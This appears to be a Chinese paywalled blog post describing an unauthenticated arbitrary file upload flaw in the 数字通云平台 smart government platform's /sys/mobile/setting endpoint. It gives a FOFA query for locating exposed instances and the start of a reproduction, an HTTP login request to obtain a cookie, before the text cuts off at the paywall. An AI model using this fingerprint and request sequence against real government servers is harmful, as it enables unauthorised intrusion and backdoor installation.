超级会员免费看
0x01 产品简介
数字通云平台智慧政务产品是基于云计算、大数据、人工智能等先进技术,为政府部门量身定制的智能化办公系统。该系统旨在提高政府部门的办公效率、协同能力和信息资源共享水平,推动电子政务向更高层次发展。
0x02 漏洞概述
数字通云平台 智慧政务 /sys/mobile/setting 接口存在任意文件上传漏洞,未授权的远程攻击者可构造恶意请求绕过身份认证,通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现环境
FOFA:body="assets/8cca19ff/css/bootstrap-yii.css"
0x04 漏洞复现
获取cookie
POST /portal/default/login HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Content-Type: application/x-www-form
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
